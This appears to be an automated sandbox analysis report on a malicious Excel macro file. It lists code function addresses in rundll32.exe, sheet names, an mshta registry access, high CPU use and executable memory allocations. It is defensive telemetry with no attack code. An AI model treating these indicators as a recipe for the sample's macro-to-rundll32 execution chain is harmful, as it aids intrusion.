Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003960C	11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100317E2	11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10040B0E	11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10031BB6	11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10041C56	11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10036CB5	11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1001CD16	11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10042D21	11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10031FC2	11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064F8FD	11_2_0064F8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064E991	11_2_0064E991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064AB87	11_2_0064AB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065907F	11_2_0065907F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00660056	11_2_00660056
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00642051	11_2_00642051
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00650001	11_2_00650001
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00649011	11_2_00649011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006470B3	11_2_006470B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006520BA	11_2_006520BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064F09B	11_2_0064F09B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00654116	11_2_00654116
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006481B7	11_2_006481B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006451BB	11_2_006451BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00642251	11_2_00642251
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065A2E8	11_2_0065A2E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064B2C7	11_2_0064B2C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064E2CC	11_2_0064E2CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00645361	11_2_00645361
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00644346	11_2_00644346
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065C3A0	11_2_0065C3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006613AD	11_2_006613AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065D389	11_2_0065D389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065E395	11_2_0065E395
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065044F	11_2_0065044F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065F435	11_2_0065F435
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006464E2	11_2_006464E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00645548	11_2_00645548
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00652550	11_2_00652550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064A55F	11_2_0064A55F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00658519	11_2_00658519
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006595FA	11_2_006595FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064E5CF	11_2_0064E5CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065A666	11_2_0065A666
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065C631	11_2_0065C631
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00658606	11_2_00658606
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006566CA	11_2_006566CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064D6D8	11_2_0064D6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065176B	11_2_0065176B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064B74D	11_2_0064B74D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00647735	11_2_00647735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065473C	11_2_0065473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00649714	11_2_00649714
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00644816	11_2_00644816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00651889	11_2_00651889
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00648969	11_2_00648969
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065894B	11_2_0065894B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006459F2	11_2_006459F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006609B5	11_2_006609B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00641A56	11_2_00641A56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065AA30	11_2_0065AA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064EA99	11_2_0064EA99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064BB7E	11_2_0064BB7E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065CB5B	11_2_0065CB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065BB23	11_2_0065BB23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00648B3D	11_2_00648B3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00650B19	11_2_00650B19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00658BE3	11_2_00658BE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065DBEA	11_2_0065DBEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00659BCF	11_2_00659BCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00642BD9	11_2_00642BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00657BA6	11_2_00657BA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00654B87	11_2_00654B87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00649B83	11_2_00649B83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00656C49	11_2_00656C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00644C5D	11_2_00644C5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00647C37	11_2_00647C37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00643C3C	11_2_00643C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065AC3A	11_2_0065AC3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00660C14	11_2_00660C14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065DCF7	11_2_0065DCF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00655CC4	11_2_00655CC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00646D24	11_2_00646D24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00656DF8	11_2_00656DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00649DCF	11_2_00649DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00657DD5	11_2_00657DD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00645E60	11_2_00645E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065AE6D	11_2_0065AE6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00650E53	11_2_00650E53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065BE27	11_2_0065BE27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00643E3F	11_2_00643E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00660E3A	11_2_00660E3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00644EE3	11_2_00644EE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00659EEC	11_2_00659EEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064AEFB	11_2_0064AEFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0065DEDC	11_2_0065DEDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064EE81	11_2_0064EE81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064CF47	11_2_0064CF47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00660F33	11_2_00660F33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00647FF2	11_2_00647FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0064DFF3	11_2_0064DFF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071847F	13_2_0071847F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00705260	13_2_00705260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00719A66	13_2_00719A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071A26D	13_2_0071A26D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00701451	13_2_00701451
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00701651	13_2_00701651
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00710253	13_2_00710253
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00700E56	13_2_00700E56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071F456	13_2_0071F456
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070405D	13_2_0070405D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00716049	13_2_00716049
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070F84F	13_2_0070F84F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071BA31	13_2_0071BA31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00719E30	13_2_00719E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071E835	13_2_0071E835
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00707037	13_2_00707037
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0072023A	13_2_0072023A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071A03A	13_2_0071A03A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070303C	13_2_0070303C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070323F	13_2_0070323F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071B227	13_2_0071B227
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00708411	13_2_00708411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00703C16	13_2_00703C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00720014	13_2_00720014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070F401	13_2_0070F401
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00717A06	13_2_00717A06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071D0F7	13_2_0071D0F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070A2FB	13_2_0070A2FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070ECFD	13_2_0070ECFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007058E2	13_2_007058E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007042E3	13_2_007042E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007196E8	13_2_007196E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007192EC	13_2_007192EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070CAD8	13_2_0070CAD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071D2DC	13_2_0071D2DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007150C4	13_2_007150C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070A6C7	13_2_0070A6C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00715ACA	13_2_00715ACA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070D6CC	13_2_0070D6CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007064B3	13_2_007064B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007114BA	13_2_007114BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070DE99	13_2_0070DE99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070E49B	13_2_0070E49B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070E281	13_2_0070E281
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00710C89	13_2_00710C89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070AF7E	13_2_0070AF7E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00704761	13_2_00704761
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00707D69	13_2_00707D69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00710B6B	13_2_00710B6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00711950	13_2_00711950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071BF5B	13_2_0071BF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070995F	13_2_0070995F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00703746	13_2_00703746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070C347	13_2_0070C347
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00704948	13_2_00704948
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00717D4B	13_2_00717D4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070AB4D	13_2_0070AB4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00720333	13_2_00720333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00706B35	13_2_00706B35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00707F3D	13_2_00707F3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071AF23	13_2_0071AF23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00706124	13_2_00706124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00708B14	13_2_00708B14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00713516	13_2_00713516
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00717919	13_2_00717919
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070FF19	13_2_0070FF19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007073F2	13_2_007073F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00704DF2	13_2_00704DF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070D3F3	13_2_0070D3F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007161F8	13_2_007161F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007189FA	13_2_007189FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00717FE3	13_2_00717FE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071CFEA	13_2_0071CFEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007171D5	13_2_007171D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00701FD9	13_2_00701FD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00718FCF	13_2_00718FCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007091CF	13_2_007091CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070D9CF	13_2_0070D9CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071FDB5	13_2_0071FDB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007075B7	13_2_007075B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007045BB	13_2_007045BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071B7A0	13_2_0071B7A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00716FA6	13_2_00716FA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_007207AD	13_2_007207AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070E991	13_2_0070E991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0070DD91	13_2_0070DD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071D795	13_2_0071D795
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00708F83	13_2_00708F83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00713F84	13_2_00713F84
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00713F87	13_2_00713F87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00709F87	13_2_00709F87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0071C789	13_2_0071C789
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E044F	13_2_006E044F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D3C3C	13_2_006D3C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D9011	13_2_006D9011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DF8FD	13_2_006DF8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DD6D8	13_2_006DD6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E20BA	13_2_006E20BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E473C	13_2_006E473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E4116	13_2_006E4116
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E95FA	13_2_006E95FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D7FF2	13_2_006D7FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D59F2	13_2_006D59F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006F13AD	13_2_006F13AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DAB87	13_2_006DAB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EAE6D	13_2_006EAE6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EA666	13_2_006EA666
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D5E60	13_2_006D5E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E907F	13_2_006E907F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E6C49	13_2_006E6C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D4C5D	13_2_006D4C5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006F0056	13_2_006F0056
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D1A56	13_2_006D1A56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D2051	13_2_006D2051
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D2251	13_2_006D2251
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E0E53	13_2_006E0E53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EBE27	13_2_006EBE27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D3E3F	13_2_006D3E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EAC3A	13_2_006EAC3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006F0E3A	13_2_006F0E3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D7C37	13_2_006D7C37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EF435	13_2_006EF435
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EAA30	13_2_006EAA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EC631	13_2_006EC631
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E8606	13_2_006E8606
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E0001	13_2_006E0001
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D4816	13_2_006D4816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006F0C14	13_2_006F0C14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E9EEC	13_2_006E9EEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EA2E8	13_2_006EA2E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D4EE3	13_2_006D4EE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D64E2	13_2_006D64E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DAEFB	13_2_006DAEFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EDCF7	13_2_006EDCF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DE2CC	13_2_006DE2CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E66CA	13_2_006E66CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DB2C7	13_2_006DB2C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E5CC4	13_2_006E5CC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EDEDC	13_2_006EDEDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D70B3	13_2_006D70B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E1889	13_2_006E1889
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DEE81	13_2_006DEE81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DEA99	13_2_006DEA99
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DF09B	13_2_006DF09B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D8969	13_2_006D8969
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E176B	13_2_006E176B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D5361	13_2_006D5361
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DBB7E	13_2_006DBB7E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DB74D	13_2_006DB74D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D5548	13_2_006D5548
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E894B	13_2_006E894B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DCF47	13_2_006DCF47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D4346	13_2_006D4346
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DA55F	13_2_006DA55F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006ECB5B	13_2_006ECB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E2550	13_2_006E2550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D6D24	13_2_006D6D24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EBB23	13_2_006EBB23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D8B3D	13_2_006D8B3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D7735	13_2_006D7735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006F0F33	13_2_006F0F33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E8519	13_2_006E8519
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E0B19	13_2_006E0B19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D9714	13_2_006D9714
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EDBEA	13_2_006EDBEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E8BE3	13_2_006E8BE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E6DF8	13_2_006E6DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DDFF3	13_2_006DDFF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E9BCF	13_2_006E9BCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D9DCF	13_2_006D9DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DE5CF	13_2_006DE5CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D2BD9	13_2_006D2BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E7DD5	13_2_006E7DD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E7BA6	13_2_006E7BA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EC3A0	13_2_006EC3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D51BB	13_2_006D51BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006F09B5	13_2_006F09B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D81B7	13_2_006D81B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006ED389	13_2_006ED389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E4B87	13_2_006E4B87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006D9B83	13_2_006D9B83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006EE395	13_2_006EE395
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006DE991	13_2_006DE991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0025F8FD	14_2_0025F8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0025AB87	14_2_0025AB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0025E991	14_2_0025E991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0026BE27	14_2_0026BE27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00257C37	14_2_00257C37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0026F435	14_2_0026F435
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0026AA30	14_2_0026AA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0026C631	14_2_0026C631
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00253C3C	14_2_00253C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00253E3F	14_2_00253E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0026AC3A	14_2_0026AC3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00270E3A	14_2_00270E3A

Source: 473D.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: 1162545482187818.xls	Macro extractor: Sheet name: REEEEEEEE
Source: 1162545482187818.xls	Macro extractor: Sheet name: REEEEEEEE

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
